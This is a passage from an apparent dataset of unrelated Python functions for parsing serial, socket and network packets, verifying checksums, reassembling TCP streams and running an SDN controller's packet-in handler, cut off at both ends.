_parse_message(self, data):\n try:\n _, values = data.split(':')\n self.serial_number, self.value = values.split(',')\n self.value = int(self.value, 16)\n\n is_bit_set = lambda b: self.value & (1 << (b - 1)) > 0\n\n # Bit 1 = unknown\n self.battery = is_bit_set(2)\n self.supervision = is_bit_set(3)\n # Bit 4 = unknown\n self.loop[2] = is_bit_set(5)\n self.loop[1] = is_bit_set(6)\n self.loop[3] = is_bit_set(7)\n self.loop[0] = is_bit_set(8)\n\n except ValueError:\n raise InvalidMessageError('Received invalid message: {0}'.format(data))", "def rcvByte(self):\r\n\t\t# verifico se c'e' qualcosa in ricezione\r\n\t\tcou = self.ser.inWaiting()\r\n\t\tif cou > 0:\r\n\t\t\t# prelievo un byte\r\n\t\t\treturn self.ser.read(cou)\r\n\t\telse:\r\n\t\t\treturn None", "def receive_state(self):\n # Wait for useful data\n received_char = self._sock.recv(1)\n while(received_char == b'\\x00'):\n received_char = self._sock.recv(1)\n\n # Decode received data\n length_str = received_char + self._sock.recv(1)\n total = int.from_bytes(length_str, \"big\")\n state = self._sock.recv(total).decode(\"UTF-8\")\n\n state = json.loads(state)\n\n return self.convert_board(state[\"board\"]), state[\"turn\"].lower()", "def Read_Response(self, expected = bytes([0x01])):\r\n data = self.Port.read(1)\r\n if data == expected: return True\r\n return False", "def code(self):\n return struct.unpack('<B', self.pkt.payload[0:1])[0]", "def verify(self, h):\n CrawlConfig.log(\"hsi(%d) attempting to verify %s\" % (h.pid(),\n self.path))\n rsp = h.hashverify(self.path)\n\n if \"TIMEOUT\" in rsp or \"ERROR\" in rsp:\n rval = \"skipped\"\n self.set('fails', self.fails + 1)\n CrawlConfig.log(\"hashverify transfer incomplete on %s -- skipping\"\n % self.path)\n h.quit()\n elif \"%s: (md5) OK\" % self.path in rsp:\n rval = \"matched\"\n CrawlConfig.log(\"hashverify matched on %s\" % self.path)\n elif \"no valid checksum found\" in rsp:\n if self.addable(self.cos):\n rval = self.add_to_sample(h)\n else:\n self.set('checksum', 0)\n rval = \"skipped\"\n CrawlConfig.log(\"hashverify skipped %s\" % self.path)\n else:\n rval = Alert.Alert(\"Checksum mismatch: %s\" % rsp)\n CrawlConfig.log(\"hashverify generated 'Checksum mismatch' \" +\n \"alert on %s\" % self.path)\n return rval", "def _get_checksum(self, arg):", "def parse(self, data):\r\n\r\n parser.Parser.parse(self, data)\r\n\r\n # in case the current state of the parser is finished, must\r\n # reset the state to the start position as the parser is\r\n # re-starting (probably a new data sequence)\r\n if self.state == FINISH_STATE: self.clear()\r\n\r\n # retrieves the size of the data that has been sent for parsing\r\n # and saves it under the size original variable\r\n size = len(data)\r\n size_o = size\r\n\r\n # iterates continuously to try to process all that\r\n # data that has been sent for processing\r\n while size > 0:\r\n\r\n if self.state <= self.state_l:\r\n method = self.states[self.state - 1]\r\n count = method(data)\r\n if count == -1: break\r\n if count == 0: continue\r\n\r\n size -= count\r\n data = data[count:]\r\n\r\n continue\r\n\r\n elif self.state == FINISH_STATE:\r\n self.clear()\r\n\r\n continue\r\n\r\n else:\r\n raise netius.ParserError(\"Invalid state '%d'\" % self.state)\r\n\r\n # in case not all of the data has been processed\r\n # must add it to the buffer so that it may be used\r\n # latter in the next parsing of the message\r\n if size > 0: self.buffer.append(data)\r\n\r\n # returns the number of read (processed) bytes of the\r\n # data that has been sent to the parser\r\n return size_o - size", "def handle_packet(self, srcif, packet) -> bool:\n typeOfPacket = packet[\"type\"]\n if typeOfPacket == DATA:\n return self.forward(srcif, packet)\n elif typeOfPacket == DUMP:\n return self.dump(packet)\n elif typeOfPacket == UPDT:\n return self.update(srcif, packet)\n elif typeOfPacket == RVKE:\n return self.revoke(packet)\n else:\n return False", "def _check_md5sum(_setup_str, src_host, src_pfn):\n\n error = PilotErrors()\n\n _cmd = '%suberftp %s \"quote cksm md5sum 0 -1 %s\"' % (_setup_str, src_host, src_pfn)\n estat, coutp = commands.getstatusoutput(_cmd)\n tolog('md5 uberftp done <%s> (%s): %s' % (_cmd, estat, coutp))\n\n if estat != 0:\n check_syserr(estat, coutp)\n if coutp.find('not understood') >= 0:\n tolog('!!WARNING!!2999!! MD5 unsupported by the server')\n return error.ERR_FAILEDMD5, coutp\n try:\n tmp0 = coutp.split('\\n')[-1]\n fmd5usm = tmp0.split()[1]\n # split removes also the trailing \"\\r\" that uberftp returns, no fmd5sum.strip()\n except:\n tolog('!!WARNING!!2999!! Unable to parse MD5')\n fmd5usm = ''\n return 0, fmd5usm", "def song_just_finished(self):\n uart_return_code = self.mp3Player.uart.readline()\n _debug(\"uart_return_code\", uart_return_code)\n # uart_return_code == b'~\\xff\\x06=\\x00\\x00\\x12\\xfe\\xac\\xef~\\xff\\x06=\\x00\\x00\\x12\\xfe\\xac\\xef'\n return uart_return_code and b'\\x06=' in uart_return_code", "def read(self, msg, ans_len):\n self.write(msg)\n # Length is sum of header(2), length, check, cmd, ans_len and end\n length = 6 + ans_len\n ans = self.sock.recv(length)\n if self.__check(ans):\n return ans[4:-2]\n return None", "def _check_packet(self, packet):\n src, dst = self._parse_packet_src_dst(packet)\n tcp = get_ip_packet(packet.load).data\n if tcp.flags & dpkt.tcp.TH_RST:\n if (src, dst) in self._last_tcp_seq:\n del self._last_tcp_seq[(src, dst)]\n else:\n if not tcp.data: raise BadPacket(\"no payload\")\n if (src, dst) in self._last_tcp_seq:\n last_seq = self._last_tcp_seq[(src, dst)]\n if tcp.seq <= last_seq:\n # this exception eliminates dups\n raise BadPacket(\"This sequence(%d<=%d) seen before\" % (tcp.seq, last_seq))\n self._last_tcp_seq[(src, dst)] = tcp.seq", "def _await_operation_result(self):\n response = ReadMessage(self.connection.receive_message())\n result = response.read_uint8()\n self._assert_success(result)", "def parse(data: bytes, port: int, origin: helpers.ConnectionType):\n # Ignore packets from master server... game server is more interesting\n if port == helpers.MASTER_PORT:\n return\n # Iteratively parse packet data until nothing is left to parse\n reads = 0\n while len(data) >= 2:\n reads += 1\n pid = data[:2]\n handler = PACKET_HANDLERS.get(pid, None)\n if handler:\n # Parse data without packet id prepended\n # Returned data will be parsed next iteration\n data = handler(data[2:], origin=origin)\n else:\n # This packet doesn't have a handler\n # Print it once for inspection\n if reads <= 1:\n print(f'[{pid}] - {data}\\n')\n # Remove the first byte and try parsing again later\n data = data[1:]", "def packetCheck(packet):\n info = [packet[i : i + 2] for i in range(0, len(packet), 2)]\n MagicNo = int.from_bytes(info[0], \"big\")\n PacketType = int.from_bytes(info[1], \"big\")\n RequestType = int.from_bytes(info[2], \"big\")\n if MagicNo != 0x497E:\n return False\n if PacketType != 0x0001:\n return False\n if RequestType != 0x0001 and RequestType != 0x0002:\n return False\n return True", "def reassemble(self) -> Optional[Dict[str, Any]]:\n # This is really crude, just make sure that we get a SYN -> SYN/AC -> ACK, then a FIN -> FIN/ACK -> ACK\n state: Dict[str, Dict[str, Optional[str]]] = {\n TCPStream.INBOUND: {\n 'syn': None,\n 'fin': None,\n },\n TCPStream.OUTBOUND: {\n 'syn': None,\n 'fin': None,\n }\n }\n sequence = {\n TCPStream.INBOUND: 0,\n TCPStream.OUTBOUND: 0,\n }\n\n def other_direction(direction: str) -> str:\n if direction == TCPStream.INBOUND:\n return TCPStream.OUTBOUND\n else:\n return TCPStream.INBOUND\n\n # Crude state machine to ensure that every SYN was ack'd and every FIN was ack'd. Should probably\n # also check that SYNs are ack'd before FINs but whatever, it works well enough for now.\n for packet in self.packets:\n direction = packet[0]\n other = other_direction(direction)\n syn = packet[1]['tcp_header']['flags']['syn']\n fin = packet[1]['tcp_header']['flags']['fin']\n ack = packet[1]['tcp_header']['flags']['ack']\n seq = packet[1]['tcp_header']['sequence']\n\n if syn:\n if state[direction]['syn'] is None:\n state[direction]['syn'] = 'sent'\n sequence[direction] = seq\n if fin:\n if state[direction]['fin'] is None:\n state[direction]['fin'] = 'sent'\n if ack:\n if state[other]['syn'] == 'sent':\n state[other]['syn'] = 'ackd'\n if state[other]['fin'] == 'sent':\n state[other]['fin'] = 'ackd'\n\n if (\n state[TCPStream.INBOUND]['syn'] == 'ackd' and\n state[TCPStream.INBOUND]['fin'] == 'ackd' and\n state[TCPStream.OUTBOUND]['syn'] == 'ackd' and\n state[TCPStream.OUTBOUND]['fin'] == 'ackd'\n ):\n # This stream is finished, can be reassembled\n data = {\n TCPStream.INBOUND: b'',\n TCPStream.OUTBOUND: b'',\n }\n\n def add_data(packet: bytes, data: bytes, offset: int) -> bytes:\n length = len(data)\n\n if len(packet) < offset:\n # Pad out, then add\n packet = packet + b'\\0' * (offset - len(packet))\n return packet + data\n if len(packet) == offset:\n # Add to end\n return packet + data\n if len(packet) > offset and len(packet) <= (offset + length):\n # Truncate, then add\n packet = packet[:offset]\n return packet + data\n if len(packet) > (offset + length):\n before = packet[:offset]\n after = packet[offset + length:]\n return before + data + after\n\n raise Exception('Logic error!')\n\n for packet in self.packets:\n dir = packet[0]\n syn = packet[1]['tcp_header']['flags']['syn']\n fin = packet[1]['tcp_header']['flags']['fin']\n ack = packet[1]['tcp_header']['flags']['ack']\n seq = packet[1]['tcp_header']['sequence']\n\n if syn:\n continue\n\n # Figure out what this packet has\n length = len(packet[1]['data'])\n position = seq - sequence[dir] - 1\n\n if length > 0:\n data[dir] = add_data(data[dir], packet[1]['data'], position)\n\n return {\n 'source_address': self.source_address,\n 'destination_address': self.destination_address,\n 'source_port': self.source_port,\n 'destination_port': self.destination_port,\n TCPStream.INBOUND: data[TCPStream.INBOUND],\n TCPStream.OUTBOUND: data[TCPStream.OUTBOUND],\n }\n\n return None", "def test_xmodem1k_recv_bad_checksum():\n # Given,\n _, send_filename = tempfile.mkstemp()\n try:\n with open(send_filename, 'wb') as stream:\n fill_binary_data(stream)\n proc = subprocess.Popen(\n (send_prog, '--xmodem', '--verbose', send_filename),\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=0)\n\n getc = functools.partial(_proc_getc_fail_16bit_checksum, proc=proc)\n putc = functools.partial(_proc_putc, proc=proc)\n\n xmodem = XMODEM1k(getc, putc)\n recv_stream = BytesIO()\n\n # Exercise,\n status = xmodem.recv(recv_stream, timeout=5, crc_mode=1)\n\n # Verify,\n assert status == recv_stream.tell()\n verify_binary_data(recv_stream, padding=b'\\x1a')\n proc.wait()\n assert proc.returncode == 0\n\n finally:\n os.unlink(send_filename)", "def check_success(out):\n\n successful_re = re.compile(r'(?<!\")completed OK!', re.I | re.M)\n try:\n succ = successful_re.search(out.decode('ascii'))\n except TypeError as e:\n succ = successful_re.search('\\n'.join(out))\n issucc = True if succ else False\n return issucc", "def main():\n\n ruleset, meta = parse_input(get_input())\n start, steps = meta\n x = run(ruleset, start, steps)\n print(\"Checksum is {}.\".format(x))\n\n return", "def parse_next_instruction(self) -> None:\n instruction = self.program[self.pointer]\n opcode = instruction % 100\n if opcode == 99:\n self.halt = True\n\n self.modes = instruction // 100\n\n if opcode == 1:\n self.op_sum()\n if opcode == 2:\n self.op_multiply()\n if opcode == 3:\n self.op_input()\n if opcode == 4:\n self.op_output()\n if opcode == 5:\n self.op_jump_if_true()\n if opcode == 6:\n self.op_jump_if_false()\n if opcode == 7:\n self.op_less_than()\n if opcode == 8:\n self.op_equal_to()\n if opcode == 9:\n self.op_adjust_relative()", "def _packet_in(self, ev):\n\n dp = ev.msg.datapath\n ofp = dp.ofproto\n parser = dp.ofproto_parser\n match = ev.msg.match\n\n ##SNDCP packet with multiple fragments recieved - print warning, send ICMP fragmentation needed\n ##TODO: Not WOrking correctly\n ## File \"/usr/local/lib/python2.7/dist-packages/ryu/ofproto/ofproto_v1_3_parser.py\", line 746, in __getitem__\n ## return dict(self._fields2)[key]\n ## KeyError: 'udp_dst'\n\n # if (match['eth_type'] == 0x0800 and match['ip_proto'] == inet.IPPROTO_UDP\n # and match['udp_dst'] == VGSN_PORT and match['sndcp_first_segment'] == 1\n # and match['sndcp_more_segments'] == 1):\n # _icmp_send(dp,match['in_port'],match['ipv4_dst'],match['ipv4_src'],match['eth_dst'],match['eth_src'],icmp_type=3,icmp_code=4)\n # LOG.warning('WARNING: Device with IP: '+match['ipv4_src']+' sent fragmented sndcp packet')\n # return\n\n ##ARP request recieved - send 'I'm here' response\n if match['eth_type'] == 0x0806 and match['arp_op'] == 1:\n LOG.debug(\"ARP request accepted\")\n _arp_send(dp=dp, port_out=match['in_port'], arp_code=2, eth_dst=match['eth_src'], eth_target=match['arp_sha'],\n ip_target=match['arp_spa'], ip_sender=match['arp_tpa'])\n LOG.debug('Reply to '+match['arp_spa'] +': Host '+match['arp_tpa']+' is at forwarder '+str(dp.id) + \" with ethX source MAC address\")\n return\n\n ##ARP response with target_ip==DISCOVERY_ARP_IP recieved - we found APN\n #\n # FIXED: All ARP responses are replied, regardless of the target IP\n #\n # TODO : At this point only ARPs belonging to the APNs networks subnet should\n # be answered\n if match['eth_type'] == 0x0806 and match['arp_op'] == 2:\n LOG.debug('TUNNEL MNGR: ARP response with target APN discovery IP recieved at controller, processing for APN extraction')\n pkt = packet.Packet(array.array('B', ev.msg.data))\n arp_pkt=pkt.get_protocol(arp.arp)\n apn_ip = arp_pkt.src_ip\n apn_mac= arp_pkt.src_mac\n port = match['in_port']\n\n ##Search for apn in APN_POOL to add mac addr. and update topology\n for sApn in APN_POOL:\n if sApn.ip_addr == apn_ip:\n LOG.debug('Recieved ARP response was from ' + sApn.name + ' APN')\n sApn.eth_addr = apn_mac\n sApn.port = port\n sApn.dpid = dp.id\n # Links towards APNs will not be measured\n topo.add_link(dp.id,str(sApn.name),port)\n topo.add_link(str(sApn.name),dp.id,0)\n topo.reload_topology()\n LOG.debug('TUNNEL MNGR: APN '+str(sApn.name)+' found at forwarder: '+str(dp.id)+', port: '+str(port) + ' by ARP search')\n\n ##Add special rules to edge forwarder\n self.on_edge_inet_dp_join(dp, port, sApn)\n\n # FIX: We do not handle bss as a special APN\n # For greater extensibility, BSS/UTRAN/LAN APNs (exit/enter) points\n # will be handled in a generic manner\n #\n ##Create MAC-tunnels between APN and all BSSs\n #for bss in BSS_POOL:\n # self.add_tunnel(bss,apn)\n #break\n\n ### WMNC: In this case, we are not making tunnels between\n # two types of ingress/egress point, but actually same type\n\n for dApn in APN_POOL:\n # we are cycling through all possible APNs, looking for different APN tupples\n # with filled HW addresses (already found by APN search)\n if sApn != dApn and dApn.eth_addr != None:\n LOG.debug('TUNNEL MNGR: Different APNs with filled HW address found, lets find out if there is tunnel between them')\n\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('TUNNEL MNGR: No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next APN discovered.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n\n\n return\n\n ##ICMP echo with dst_ip==DISCOVERY_IP_DST recieved - new link between forwarders is up\n if match['eth_type'] == 0x0800 and match['ipv4_dst'] == DISCOVERY_IP_DST and match['ip_proto'] == 1:\n #LOG.debug('TOPO MNGR: ICMP echo recieved at controller, processing for link extraction or latency measurement')\n\n pkt = packet.Packet(array.array('B', ev.msg.data))\n\n ##Discovery pings carry information about sending datapath in payload of icmp packet\n ##these information are in Dictionary format, we parse the out with _icmp_parse_payload() method\n body = _icmp_parse_payload(pkt)\n neighbourDPID=body['dpid']\n neighbourPort=body['port_out']\n\n ## measurement\n ## currentClock moved way up to improve precision\n receivedClock=float(body['clock'])\n currentClock = time.clock()\n latency = currentClock - receivedClock\n\n currentDate = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n ##Update latency or add new edges to topology.\n if topo.DynamicGraph.has_edge(dp.id, neighbourDPID) and topo.DynamicGraph.has_edge(neighbourDPID, dp.id):\n topo.StaticGraph[neighbourDPID][dp.id]['pdv'] = topo.StaticGraph[neighbourDPID][dp.id]['lat'] - latency\n topo.StaticGraph[neighbourDPID][dp.id]['lat'] = latency\n topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n #topo.StaticGraph[neighbourDPID][dp.id]['upt'] = currentDate\n loss = self.loss_update(neighbourDPID, dp.id, currentDate)\n #LOG.debug('TOPO MNGR: Updating latency ' + str(latency) + ' and date ' + str(currentDate) + ' LOSS: ' + str(loss))\n topo.reload_topology()\n else:\n ## latency not correct for both directions when adding links\n ## update occurs on receive of next measurement packet from oposite direction\n topo.add_link(dp.id, neighbourDPID, ev.msg.match['in_port'], latency, currentDate)\n topo.add_link(neighbourDPID, dp.id, neighbourPort , latency, currentDate)\n LOG.debug('TOPO MNGR: Topology changed: New link between forwarder ID '+str(dp.id)+ ' via port ' + str(ev.msg.match['in_port'])\n +' and forwarder ID '+str(neighbourDPID)+ ' via port ' + str(neighbourPort) + ' was discovered.')\n\n topo.reload_topology()\n ## retry to create tunnels\n ## find better paths between APNs\n for sApn in APN_POOL:\n for dApn in APN_POOL:\n if sApn != dApn:\n LOG.debug('TOPO MNGR: Topology changed: trying to re-build inactive tunnel between:' + sApn.name + ' and ' + dApn.name)\n paths = False\n try:\n paths = nx.all_simple_paths(topo.DynamicGraph, source=sApn.name, target=dApn.name)\n except:\n LOG.debug('No path between: ' + sApn.name + ' and ' + dApn.name + '. Retry when next fwd connects.')\n\n LOG.debug('TUNNEL MNGR: These are the paths between them (possible tunnels):')\n if paths:\n for path in paths:\n LOG.debug('TUNNEL MNGR: Calling add_plainMacTunnel for ' + sApn.name + ' and ' + dApn.name + ' with path: ' + str(path))\n self.add_plainMacTunnel(sApn, dApn, path)\n else:\n LOG.debug('TUNNEL MNGR: PATHS == 0 ????????????????')\n return\n\n # flow of last resort (process for routing)\n if match['eth_type'] == 0x0800:\n # LOG.debug('*****************Flow of last resort matched(plain IP), process for routing********'\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'] + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp'])))\n ## Not very proud of myself, but it will do the trick\n ## Turbo lumberjack routing logic\n ## TODO: Implement a longest prefix match routing\n\n candidates = []\n\n for source, destination, ip_dscp in routesList:\n if ((source == match['ipv4_dst'] and destination == match['ipv4_src']) or (source == match['ipv4_src'] and destination == match['ipv4_dst'])) and ip_dscp == match['ip_dscp']:\n # LOG.debug('ROUTING: route source: ' + str(source) + 'destination: ' + str(destination)\n # + ' match[ipv4_dst]: ' + str(match['ipv4_dst'])\n # + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(ip_dscp)\n # + ' already exists, aborting addition of new route')\n return\n\n for tunnel in TUNNELS:\n if (tunnel.sApn.ip_addr == match['ipv4_dst'] and tunnel.dApn.ip_addr == match['ipv4_src']) or (tunnel.sApn.ip_addr == match['ipv4_src'] and tunnel.dApn.ip_addr == match['ipv4_dst']):\n LOG.debug('ROUTING: Tunnel candidate found in list of tunnels. Adding tunnel path: ' + str(tunnel.po_edges) + ' to candidates.')\n candidates.append(tunnel)\n\n trafficClass = self.TC_selection(match['ip_dscp'])\n\n if len(candidates) == 0:\n LOG.debug('ROUTING: match[ipv4_dst]: ' + str(match['ipv4_dst'])\n + ' match[ipv4_src]: ' + str(match['ipv4_src']) + ' DSCP: ' + str(match['ip_dscp']))\n LOG.debug('ROUTING: ERROR, NO feasible tunnels for such route.')\n return\n\n LOG.debug('Looking for tunnels: DST_IP: ' + match['ipv4_dst'] + ' SRC_IP: ' + match['ipv4_src'] + ' DSCP: ' + str(match['ip_dscp']) + '(traffic class: ' + str(trafficClass) + ')' + ' Incoming from FWD: ' + str(dp.id))\n tunnel = self.tunnel_selection(trafficClass, candidates)\n LOG.debug('TE MNGR: Selected tunnel Path out: ' + str(tunnel.path_out_str) + ' meter_id: ' + str(tunnel.meter_id))\n\n dscp = match['ip_dscp']\n\n ## meter_id\n ## 2,4,6,8,10 = 500kbps, 1,3,5,7,9 = 1000kbps ...\n ## 0 = 100Gbps\n meter_id = tunnel.meter_id\n\n #\n # FIXME: incomplete set of rules installed on LAN Access forwarders\n # TODO : Philosophy of table IDs should be clarified, as now it total mess!!!\n # TODO : this should be done only once, from that moment, all user plane packets\n # should travelse only forwarder and should not be sent to controller\n\n\n\n #WAY OUT\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.dApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_src=tunnel.tid_in), parser.OFPActionSetField(eth_dst=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id=INGRESS_TABLE)\n dp.send_msg(req)\n\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.dApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.dApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_out))\n\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_out)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.dApn.eth_addr), parser.OFPActionOutput(tunnel.path_out[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY OUT to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.dApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_out)+ ' dApn ETH addr: ' + str(tunnel.dApn.eth_addr))\n\n #WAY IN\n dp = dpset.get(tunnel.dApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_type=0x0800, ipv4_dst=tunnel.sApn.ip_addr, ip_dscp=dscp)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.tid_in), parser.OFPActionSetField(eth_src=tunnel.tid_out)]\n inst = [parser.OFPInstructionGotoTable(MAC_TUNNEL_TABLE), parser.OFPInstructionMeter(meter_id), parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=100, match=match, instructions=inst, table_id = INGRESS_TABLE)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(INGRESS_TABLE) + ' DP ID: ' + str(tunnel.sApn.dpid) + ' Tunel dApn IP addr: ' + str(tunnel.sApn.ip_addr) + ' Tunnel ID: ' + str(tunnel.tid_in))\n\n\n dp = dpset.get(tunnel.sApn.dpid)\n parser = dp.ofproto_parser\n ofp = dp.ofproto\n match = parser.OFPMatch (eth_dst=tunnel.tid_in)\n actions = [parser.OFPActionSetField(eth_dst=tunnel.sApn.eth_addr), parser.OFPActionOutput(tunnel.path_in[-1].port_out)]\n inst = [parser.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions)]\n req = parser.OFPFlowMod(datapath=dp, priority=300, match=match, instructions=inst, table_id=ACCESS_ADAPTATION_TABLE_OUT)\n dp.send_msg(req)\n LOG.debug('ROUTING: Installing flow ON WAY IN to forwarderID: ' + str(dp.id) + ',Table: ' + str(ACCESS_ADAPTATION_TABLE_OUT) + ' DP ID: ' + str(tunnel.sApn.dpid)+ ' Tunel ID: ' + str(tunnel.tid_in)+ ' sApn ETH addr: ' + str(tunnel.sApn.eth_addr))\n\n\n LOG.debug('ROUTING: Rules on access edge forwarders installed')\n LOG.debug('ROUTING: Adding route: DST_IP: ' + tunnel.dApn.ip_addr + ' SRC_IP: ' + tunnel.sApn.ip_addr + ' dscp: ' + str(dscp) + ' path out str: ' + tunnel.path_out_str )\n routesList.append( ( tunnel.sApn.ip_addr, tunnel.dApn.ip_addr, dscp) )\n\n parser = dp.ofproto_parser\n\n for dpid in LAN_TYPE_FORWARDERS:\n ## DUNNO why this rule with low priority still hits traffic which is also matched by rules with IP address matches\n ## Here I delete the rule, it is added on FWD when it connects to controoller\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dpid) + ' is a LAN edge forwarder, deleting rules')\n dp = dpset.get(dpid)\n priority = 2\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.mod_flow(dp, command=dp.ofproto.OFPFC_DELETE_STRICT,\n table_id=0, actions=actions,\n match=match, priority=priority)\n\n LOG.debug('TOPO MNGR: Forwarder: ' + str(dp.id) + ' is a LAN edge forwarder, installing rules again :)')\n match = parser.OFPMatch(eth_type=0x0800)\n actions = [parser.OFPActionOutput(ofp.OFPP_CONTROLLER)]\n self.add_flow(dp, 2, match, actions)", "def get_response(self):\n\n response = self.socket.recv(1024)\n code = response.split(\" \")[0]\n message = response[4:]\n\n return int(code), message", "def read_test(self, cmd):\n w_bytes = [random.randrange(0, 128) for i in range(0, 16)]\n self._pyb.send(w_bytes)\n self._serial.reset_input_buffer()\n self._serial.write('\\r\\n'.encode('utf-8'))\n self._serial.write(cmd.encode('utf-8'))\n self._serial.write('\\r\\n'.encode('utf-8'))\n\n res = self._serial.read_until(terminator=serial.to_bytes([ord(c) for c in 'Ignored '])).decode('utf-8')\n self._pyb.deinit()\n\n r_bytes = []\n for x in re.sub('\\r', '', res).split('\\n'):\n if x.find('IGNORE') != -1:\n r_bytes = [int(s, 16) for s in x.split(',') if len(s) == 2]\n break\n\n if self.compare_host_dut_result(w_bytes, r_bytes) == -1:\n print(repr(res))\n return \"Fail\"\n\n return \"Pass\"", "def callback(self, pkt):\n if ARP in pkt:\n self.parse_ip(pkt.sprintf(\"%ARP.psrc%\"))\n if TCP in pkt or UDP in pkt:\n self.parse_ip(pkt.sprintf(\"%IP.src%\"))\n self.parse_ip(pkt.sprintf(\"%IP.dst%\"))", "def state_end_sub(self, byte):\n self.telnet_cmd.append(byte)\n if byte == 240:\n self.handle_telnet_cmd(self.telnet_cmd)\n self.next_fn = self.state_text\n else:\n self.next_fn = self.state_sub", "def check_packet(self, header, string):\n\n string = string[0:11] + string[75:]\n gen_chksum = hashlib.sha256(string.encode()).hexdigest()\n try:\n if header[\"checksum\"] == gen_chksum:\n return True\n else:\n return False\n except KeyError:\n return False", "def parse(line: str):\n # Arduino sends 'keep alive' packets to keep the serial connection open\n # the keep alive packet is just an empty byte\n if line == '':\n return Action('DEBUG', 'Arduino sent keep alive packet')\n # Handles special packets\n if '|' in line:\n split_line: List[str] = line.split('|')\n directive: str = split_line[0]\n value = None\n if directive == 'DEBUG':\n value = split_line[1]\n return Action(directive, value)\n # Handles foot action\n try:\n [l_pitch, l_yaw, l_roll,\n r_pitch, r_yaw, r_roll] = list(map(int, line.split(' ')))\n except ValueError as ex:\n raise RuntimeError(f'FOOT packet unrecognized: {line}') from ex\n return Action('FOOT', {\n 'left': {\n 'pitch': l_pitch,\n 'yaw': l_yaw,\n 'roll': l_roll\n },\n 'right': {\n 'pitch': r_pitch,\n 'yaw': r_yaw,\n 'roll': r_roll\n }\n })", "def _checksum(cls, buff):\n checksum = 0\n\n while True:\n data = buff.read(cls.checksum_struct.size)\n\n if len(data) == 0:\n break\n if len(data) < 4:\n pad_count = len(data) % 4\n data = data + \"\\x00\" * pad_count\n raise ValueError(\"Checksum data length is not a multiple of 4. %d\" % len(data))\n print(data)\n c1, c2 = cls.checksum_struct.unpack(data)\n checksum += c1 + c2\n print(checksum, checksum % 65536) # novatel 32 bit crc\n return checksum % 65536", "def test_xmodem_recv_bad_checksum():\n # Given,\n _, send_filename = tempfile.mkstemp()\n try:\n with open(send_filename, 'wb') as stream:\n fill_binary_data(stream)\n proc = subprocess.Popen(\n (send_prog, '--xmodem', '--verbose', send_filename),\n stdin=subprocess.PIPE, stdout=subprocess.PIPE, bufsize=0)\n\n getc = functools.partial(_proc_getc_fail_16bit_checksum, proc=proc)\n putc = functools.partial(_proc_putc, proc=proc)\n\n xmodem = XMODEM(getc, putc)\n recv_stream = BytesIO()\n\n # Exercise,\n status = xmodem.recv(recv_stream, timeout=5, crc_mode=1)\n\n # Verify,\n assert status == recv_stream.tell()\n verify_binary_data(recv_stream, padding=b'\\x1a')\n proc.wait()\n assert proc.returncode == 0\n\n finally:\n os.unlink(send_filename)", "def receive(self, timeout_sec: float, expected_cmd_reply: Optional[int]) -> Tuple[bytes, bool]:\n\n # Sanity check.\n if timeout_sec <= 0:\n raise ValueError('Timeout cannot be less or equal zero')\n\n # Calculate timeout\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n timeout = now + timeout_sec\n\n # Checksum OK?\n checksum_ok = False\n while not checksum_ok:\n # Get start of a command\n got_command = False\n while not got_command:\n # Wait for sync byte\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n while timeout > now:\n self._uart.timeout = timeout - now\n sync_byte = self._uart.read(size=1)\n if len(sync_byte) != 1:\n raise TimeoutError('Waiting for sync byte timed out')\n if sync_byte[0] == 0xAA:\n break\n now = time.clock_gettime(time.CLOCK_MONOTONIC)\n\n # Get command byte. 0xAA is not a valid command reply or indication.\n # Skip superfluous 